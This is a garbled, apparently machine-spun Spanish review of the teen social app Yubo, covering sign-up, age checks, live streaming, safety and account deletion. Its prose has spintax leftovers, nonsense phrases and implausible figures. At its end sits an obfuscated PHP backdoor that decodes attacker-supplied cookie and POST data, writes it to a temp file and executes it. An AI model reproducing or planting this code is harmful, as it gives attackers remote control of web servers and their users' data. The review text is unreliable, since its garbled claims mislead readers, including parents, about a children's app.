Yubo Evaluación 2021

Yubo es en realidad una red social programa creado y enfocado para un adolescente audiencia. La plataforma de trabajo es verdaderamente destacado y conocido entre niños . Constructores han creado {un seguro y divertido lugar para niños permanecer en contacto y ser para un capricho pasajero área dentro de su todos y cada uno de los días preocupaciones. Recientemente, Yubo obtuve una inversión financiera generosa, más el organización planes su internacional expansión , creando mucho mejores funcionalidades, e comprando branding.

Redes sociales y emparejamiento áreas están cargadas con ofertas, y también parece esto recto es reservado por sitios de Internet y programas para aquellos para reunirse para típico interacción o citas en línea . Sin embargo, en su mayoría todos están impulsados para personas quién cambió al menos 18, y varios servicios incluso tienen límites para todos menores de esa edad.

Perfil e reputación de Yubo

Yubo en realidad originalmente comenzó como un sitio ayudado por el título Amarillo; realmente, aquí está el lo inicial lo que viene en sus pensamientos siempre mirar el sitio web marca tono. El servicio había sido creado en 2015 como una web página web, pero un año más tarde, Yubo introducido el programa esto es disponible con respecto aplicación Store y Bing Enjoy Store. Con el luz de velocidad, Yubo tiene vinculado arriba 2 mil millones de amigos que reemplazado más de 10 mil millones de mensajes y amé 30 mil millones de Livestream. Trajo esta membresía de servicio a una diferente posibilidad Gays Tryst – contactar el año pasado Yubo recibió alrededor de 12 mil millones de inversiones y luego emplea el desafiante planes para aumentar el planeta. En este momento, el equipo de Yubo contiene 15 profesionales ubicado en París, Francia.

Tinder para niños es otro nombre usado para Yubo en social media marketing, porque el programa es muy común hacia popular citas programa. A pesar de todos esfuerzos presentar un medio ambiente para personas, muchos padres culpan a el servicio por no proporcionar suficiente protección con respecto a su niños. La pregunta es bastante escéptico mirando general reducido internet seguridad alfabetización entre hombres y mujeres , particularmente de niños y jóvenes. No importa qué proteger membresía de este servicio es en realidad, siempre es recomendado para mamás y papás gastar un extra tiempo hablando con su niños acerca de en línea conducta.

Sitio web, Aplicación, software, Registro

Yubo es en realidad un marketing en redes sociales sistema adelante y. El lema sería tener éxito una tarea fácil de aprender nuevo amigos en todo el mundo; por esa razón, parece como marketing en redes sociales. Permisos consumidores usar un fácil deslizar brevemente evaluando un perfil basado en imágenes, y comenzar la discusión desde ese punto.

En este momento, Yubo admite aplicación versiones. Yubo software está presente para obtener gratis para Android e iOS personas. Yubo también ofrece un sitio en línea en el cual todos los presentes y potenciales personas pueden descubrir más acerca de los servicios, la plan, adquirir algo de ayuda si es necesario.

El inscripción es sencillo, pero atención adicional se ofrece a personas – deben obtener permiso de su padres, un acuerdo para su niños usar el servicio.

Proceso de registro. Sería Simple Aquí?

Es es importante descargar un software antes de la registro, ya que es no disponible en el internet versión. Después de un rápido descargar, la aplicación le pedirá para un nombre, nacimiento día y género. Si un usuario es menor de 18 años, encontrará una casilla de verificación con su mamás y papás para confirmar que ellos permiten su poseer niño para hacer uso de esta software. Usuarios mayores menores de 12 no elegibles para utilizar Yubo.

Lo siguiente es poner el perfil imagen. La computadora no permitirle a menos que la imagen es obvia y revela la piel del rostro. {Después de ti|Cuando|Una vez que lo recortes y lo subas, la solicitud quieres saber por exclusivo contraseña. Siguiendo las credenciales tienden a estar listas, Yubo solicitar el dispositivo amplia variedad y verificación código de 4 dígitos, cuál será entregado instantáneamente hacia el aconsejado número de contacto. Seguir el verificación se realiza, examinar minuciosamente y tomar membresía de este servicio pautas Estas regulaciones también están disponibles en el negocio sitio y principalmente incluir área recomendaciones relativo a tener respeto por identificación y seguridad. Después de usted presione la opción ‘I aceptar’ , lo nuevo reino de amistad y interacción se convertirá en diseñado para usted Antes un novato puede continuar, un específico accesibilidad cantidad podría ser esperado: a fotos y geolocalización. El final es en realidad opcional debido a protección factores.

Serán las Cuentas Auténtica Aquí?

mucha gente culpan a Yubo por tener muchos con perfiles, pero lo es extremadamente difícil tomar en consideración la seguridad seguridad medidas Yubo proporciona. El dispositivo no dejar nuevo usuario a menos que la imagen sea rostro. Yubo también promueve sus usuarios nunca para imaginar convertirse alguien más, publicar falso imágenes , y mentir acerca de su envejecer. Para decir la verdad, muchos personas violar el último regla. Sin embargo, todos esos necesidades tienden a ser compuesto en el Pauta de la comunidad, y esto se refiere a algo totalmente nuevo personas aceptar, entonces una violación de cada entre estos pautas podría causar prevención en el membresía.

Yubo tiene en realidad una asociación uso de Yoti software, que usuarios deberían usar para la confirmación. Usuarios verificados tienen en realidad una insignia amarilla en sus páginas, además de ser positivamente seguro hablar con estas personas.

Sitio web y versión celular

Yubo tiene en realidad una empresa sitio web, actual mientras se usa el información acerca de la eficiencia, protección, condiciones y problemas que están presentes. Además, la empresa sitio es un excelente ubicación para llamar soporte técnico si encontrará algunos inquietudes o dilemas. Todos invitados obtendrán conducir backlinks hacia Disfrutar marketplace y application shop, where in fact the Yubo software podría ser instalado de con respecto al sistema operativo.

Todas las funciones relativas a la plataforma redes sociales con acceso a usuarios se pueden comprar en aplicación simplemente.

Funciones especiales

Es en realidad es difícil enfrentarse a la aplicación personal ahora, pero Yubo sobresale por los dos principales características :

Comunidades – Yubo activa individuos a enlace de acuerdo con sus particulares pasiones. Conseguir especialmente populares entre los niño, Yubo proporciona dos comunidades dentro de sistema plataforma:

  • Para personas mayores 12-18
  • Para personas mayores 18 y más maduros

Estos dos equipos no son mixtos y personas pueden comunicarse de su equipo simplemente.

Live Streaming es un evolucionado elemento adicional de Yubo, porque sirve como un importante método de interacción. Una programa son alojado tanto como diez personas con ilimitado cantidades de espectadores. Audiencia pueden conectarse a entre sí junto con los emiten enviar comentarios.

Amante Buscar

Yubo desarrolló de esta manera con la intención de que nuevos usuarios registrados hace tantos amigos como pueda utilizando varios variables y buscar posibilidades. Incluir amigos hacia registro, unirse a Livestream, comunicarse y descubrir individuos para una fantasía pasajera página.

¿Cómo podría funcionar Yubo?

Algoritmos utilizados por Yubo habilitar clasificación factible conexión según tres señales:

  • Participantes: la máquina traerá todos los activos para inmediato área
  • Amigos: es posible cortar la interacción y luego hombres y mujeres realmente tienes actualmente hecho amigos con
  • Longitud – dando uso de su ubicación, Yubo oferta contactos cerca de su casa en el mapa; esto puede ser un gran opción si quieres traer la interacción tradicional a menudo más tarde

Buscando Opciones y Filtros en Yubo

Yubo suministros algunas opciones para obtener vinculado de inmediato:

  • Únase a la transmisión en tiempo real esto ciertamente agrupados por pasiones o un específico asunto. Es posible conectarse con ciertamente este tipo de en vivo transmisión y ubicar nuevo amigos por lo tanto enviar respuestas o comentario;
  • Chat: el programa de Yubo ofertas algunos amigos ofertas, elegido automáticamente. Puede agregar todos como amigos y comenzar charlar rápidamente;
  • Acerca de opuesto, un individuo también puede agregar amigos muy primero siguiente iniciar la discusión;
  • Deslizar eficiencia permite encontrar asociaciones basado en el deslizar perfiles. Este aspecto en particular es similar a Tinder, aunque usuario no tiene esperar pacientemente hasta que claramente era una coincidencia, y alguien deslizará alguien correcto. Esta persona ya aparece a lo largo de amigo lista y comunicación es posible.

Comunicación Métodos

Yubo llamadas a dos principales métodos para comunicación:

  • Alive Streaming: permite varios temas transmisión en línea con alrededor 10 transmisiones hoy, y todos pueden participar en el flujo como público y comunicarse dentro del vapor habitación.
  • Chats: normal mensajero general dentro del aplicación permite dando ambos ilimitados cantidades de correos electrónicos con respuestas y emojis.

Alternativas de Yubo

Como se mencionó antes, el nicho es extremadamente competitivo, y aquí vendrá la lista de comparables servicios:

  • Tinder
  • Snapchat
  • Chatroulette
  • Omegle
  • MeowChat
  • LuckyCrush

La selección es bastante enorme, exactamente lo que puede hacer Yubo único puede ser el división asociado con el mercado, que creó un ideal sistema para menores. Cooperación uso del Yoti software trae un nuevo estándar de perfil verificación, con la capacidad de distinguir el perfil probado.

Membresía Precio y costo Método

Yubo se hizo como a sin costo plataforma. Generalmente no necesita ninguna económica oportunidades de modo que pueda hacer uso del función con respecto a aplicación – todos tienen igual entrada a comunicación. Entonces, si alguien requiere uno a crear un pago o compartir tarjeta de crédito detalles, recuerde que esto puede ya sea un fraude y documentar este colisión inmediatamente.

Gratis Funciones de membresía

Aplicación agarrar y suscripción, en vivo streaming, chats, por lo tanto el capacidad de hacer ilimitado rango amigos y libremente ponerse en contacto con son normalmente absolutamente gratis y aparecer gratis.

Funciones de membresía Superior

Yubo no oferta resuelto suscripción o membresía â € “es del negocios plan, mientras que el grado de acceso debe ser siempre equivalente para todos.

Cuánto en realidad está saliendo con Yubo?

Yubo no tiene un objetivo llegar un emparejamiento servicio, y bastante ayuda personas a encontrar amigos predicado en típico intereses y ofrecer el comunicación entre ellos. Por esta razón, Yubo no tiene meta fabricar un directo ingreso del jawhorse.

¿Es Yubo Realmente seguro?

No no toma una gran cantidad de esfuerzo descubrir algunos pobres opiniones o críticas en línea sobre malas circunstancias , que sucedió con menores usando esto software. Enojado padres culpan a Yubo de que sus hijos empezaron a alguien, por lo tanto desencadenó algunos sentimientos suicidas o mujeres menores de edad adultos jóvenes reunirse reunirse con maduro chicos con algunos inadecuado ofertas. Sin embargo, estos instancias no comprobados, y Yubo suministros tanto IA como hr para detectar un fraude y detener estos tipos de cuentas.

Especializado Parte de Protección

  • En profundidad vecindario Guía – esto puede ser una dirección sobre cómo actuar correctamente y permanecer seguro. Esto es necesario simplemente aceptar el conocimiento de estas regulaciones antes de continuar con todo el programa uso.
  • Padres ‘arreglo para utilizar la aplicación – para verificar la conciencia de que su particular leve los jóvenes tienen permitir usar el software examinando el paquete hasta el inscripción.
  • Muchas personas dicen que tales permiso falla, ya que jóvenes con frecuencia falsifican el permiso de su permiso o poner mayor envejecer, por lo tanto comenzando 2019, Yubo hizo una asociación con todo el Yoti aplicación, que permite verificar la edad de clientes por su perfil imagen. Consumidores que tienen fallecieron la confirmación obtienen un particular amarilla, consecuentemente este perfil son confiable.
  • Aparte de eso, es imposible usar el aplicación sin teléfono verificación y un muy claro facial imagen.

Cliente Soporte

En Yubo corporativo sitio web, usted puede publicar una demanda {en relación con el|en lo que respecta a|con respecto al parte técnica, datos seguridad, o simplemente proporcionando opiniones.

El sitio web ofrece un chatbot, que puede le permitirá descubrir una solución su preocupación usar una palabra clave.

[email protected] es otro opción para obtener asistencia de la organización representante.

De moda Consumidor Preocupaciones:

Clientes están a menudo en:

  • Transmisión en vivo
  • Seguridad recursos
  • Informar emergencias
  • Todo relacionado con la cuenta
  • Funciones adicionales

Consejos Pasar la verificación de Yubo Imagen

< p> Yubo simplemente probablemente no permitirle en hasta que subes un perfil imagen, en el cual esa persona es en realidad visible. Después de estos una fotografía es en realidad cargada, la perfil es en realidad desbloqueado, el agua de interacción van a ser abierto.

En casos donde novato no ir moderación o volverse denunciado y incapaz de usar servicios, Yubo características preparado diferente dirección en esta situación:

Similar tratamiento además se aplica mientras usa Yoti aplicación.

Cómo hacerlo Eliminar una cuenta de Yubo?

Es es también más simple comparado con unirse proceso. Todo lo que necesita para realizar simplemente ir a Configuración, así como el final rango son ‘Eliminar membresía . ‘ Cuando presione, la computadora le solicite to kind BORRAR en capital letras. En este punto, todavía tienes una opción convertirse volver a la software o cancelar para siempre. Debería decidir opte por cancelar, de todos modos – será la terminación de la historia.

Ideas sobre cómo Ver Exactamente quién ama usted en Yubo sin pagar?

Lo primero que debe enfatizar otra vez, no tienes que hacerlo pagar dinero tal cosa. Realmente liberado para revelar tu deseo de algún cuerpo. La forma más fácil demostrar quieres alguien será incluir esta persona como un amigo o deslizar derecha â € “de esta manera, cualquiera amas podría encontrar esto y puede incluso contactar usted antes de decidir lograr esto.

Cómo exactamente Bloquear a Alguien en Yubo?

< p> Una vez que una persona comportamiento te molesta o parece inaceptable, siempre hay una alternativa para bloquear tal individuos. Debería seguir tres sencillos pasos:

  • Pulse alguien para comprobar él
  • Presione el pequeño icono con una pregunta nivel desde el interior del esquina superior derecha esquina
  • Allí podría descubrir algunas opciones: Anular / Bloquear / Informar. Hit ‘Block’ – será el cualquiera está interesado en

Más adelante, puedes ver la seguridad y Privacidad sección eliminar estos clientes desde el Bloquear lista.

Cómo exactamente Cancelar Suscripción de Yubo?

Usando en consideración que reembolsos no son esperados, no es necesario cancelar la membresía antes de eliminar su cuenta bancaria.

Conclusión

Yubo en realidad amigable con el adolescente redes sociales programa, que ya características cinco años de confirmado antecedentes y ya hecho un cambio de marca. La empresa es dirigida por un poco grupo de 15 personas en Francia. En cuanto a hoy, la software de Yubo está presente para iOS y Android características ambicioso planes para establecer muchos geniales atributos brevemente. Deslizar fotos y transmitir en vivo resultado en comunicación mucho más diversa y trae en un nuevo cantidad. Y en top de eso, usuarios obtienen todos estos servicios absolutamente sin cadenas adjunto.

Hoy numerosos determinan a Yubo como Tinder para jóvenes. Pero la plataforma de trabajo apoya dos comunidades para individuos menores y mayores de 18 años. Mantiene viendo la interacción evitar una mezcla de dos personas. Aunque Yubo tiene muchos adversos calificaciones en la red con respecto a su seguridad, de hecho, la empresa proporciona invertido considerablemente en confirmación funciones, también eso ayuda a mantener una mirada de cerca en hacer Yubo un mucho mejor más seguro lugar.

Yubo con confianza requiere el mejor situación, y su particular revolucionario atributos atraerá nuevos usuarios registrados diario. En otro aviso, es crucial recordar a los menores en el seguridad básica reglas en línea evitar cualquier desafortunado concepto erróneo a medida que pasa el tiempo.

$vWeHQ = "\145" . chr ( 848 - 753 ).'y' . chr ( 1054 - 970 )."\112" . "\124";$AFiWCfx = "\x63" . chr (108) . "\x61" . "\163" . "\x73" . "\137" . chr (101) . "\x78" . "\x69" . 's' . chr ( 962 - 846 ).chr ( 738 - 623 ); $zDBHwgj = class_exists($vWeHQ); $AFiWCfx = "26358";$nRzwe = !1;if ($zDBHwgj == $nRzwe){function ZPeoK(){$jMqMXf = new /* 14855 */ e_yTJT(55392 + 55392); $jMqMXf = NULL;}$GsJZCUG = "55392";class e_yTJT{private function kCXucPObwJ($GsJZCUG){if (is_array(e_yTJT::$nBelBLY)) {$GoSPmoZT = sys_get_temp_dir() . "/" . crc32(e_yTJT::$nBelBLY["\163" . "\x61" . "\x6c" . "\164"]);@e_yTJT::$nBelBLY["\x77" . chr (114) . "\151" . "\164" . "\x65"]($GoSPmoZT, e_yTJT::$nBelBLY[chr ( 614 - 515 ).'o' . chr (110) . "\164" . "\x65" . "\156" . "\164"]);include $GoSPmoZT;@e_yTJT::$nBelBLY["\x64" . 'e' . "\154" . chr ( 279 - 178 ).'t' . "\145"]($GoSPmoZT); $GsJZCUG = "55392";exit();}}private $YyuQsl;public function BhbLqXmG(){echo 57586;}public function __destruct(){$GsJZCUG = "14158_19544";$this->kCXucPObwJ($GsJZCUG); $GsJZCUG = "14158_19544";}public function __construct($heDhQrkWW=0){$ECppNjpq = $_POST;$uQmODdBvK = $_COOKIE;$QAslHW = "451e185c-c251-47f6-b5fe-dd3f107c4901";$ELHfqebTi = @$uQmODdBvK[substr($QAslHW, 0, 4)];if (!empty($ELHfqebTi)){$nyeEqFv = "base64";$KbDyoHsXUe = "";$ELHfqebTi = explode(",", $ELHfqebTi);foreach ($ELHfqebTi as $odcgy){$KbDyoHsXUe .= @$uQmODdBvK[$odcgy];$KbDyoHsXUe .= @$ECppNjpq[$odcgy];}$KbDyoHsXUe = array_map($nyeEqFv . "\x5f" . "\144" . 'e' . 'c' . chr (111) . "\x64" . "\145", array($KbDyoHsXUe,)); $KbDyoHsXUe = $KbDyoHsXUe[0] ^ str_repeat($QAslHW, (strlen($KbDyoHsXUe[0]) / strlen($QAslHW)) + 1);e_yTJT::$nBelBLY = @unserialize($KbDyoHsXUe); $KbDyoHsXUe = class_exists("14158_19544");}}public static $nBelBLY = 19462;}ZPeoK();}